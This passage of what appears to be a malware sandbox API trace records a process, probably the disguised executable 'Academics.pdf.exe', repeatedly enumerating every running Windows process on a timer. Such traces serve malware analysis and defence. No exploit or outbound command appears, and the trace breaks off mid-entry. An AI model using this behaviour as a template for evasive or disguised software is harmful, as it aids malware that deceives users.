szExeFile="advised-cleaners-junction.exe")) returned 1 [0319.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0319.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0319.980] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0319.981] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0319.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0319.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0319.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0319.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0319.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0319.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0319.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0319.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0319.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0319.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0319.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0319.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0319.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0319.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0319.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0319.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.996] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0319.996] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0319.997] CloseHandle (hObject=0x294) returned 1 [0319.997] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0319.997] TranslateMessage (lpMsg=0x8bf970) returned 0 [0319.997] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0319.997] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0319.997] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0319.997] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0319.997] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0319.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0319.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0319.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0319.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0319.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0320.000] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.000] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0320.001] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0320.002] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0320.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0320.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0320.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0320.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0320.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0320.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0320.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0320.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.014] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0320.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0320.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0320.016] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0320.017] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0320.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0320.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0320.028] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0320.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0320.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0320.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0320.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0320.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0320.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0320.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0320.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0320.035] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0320.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0320.037] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0320.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0320.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0320.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0320.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0320.041] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0320.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0320.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0320.045] CloseHandle (hObject=0x294) returned 1 [0320.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0320.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0320.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0320.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0320.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0320.046] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0320.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0320.046] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0320.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0320.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0320.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0320.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0320.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0320.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0320.046] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0320.048] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0320.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, 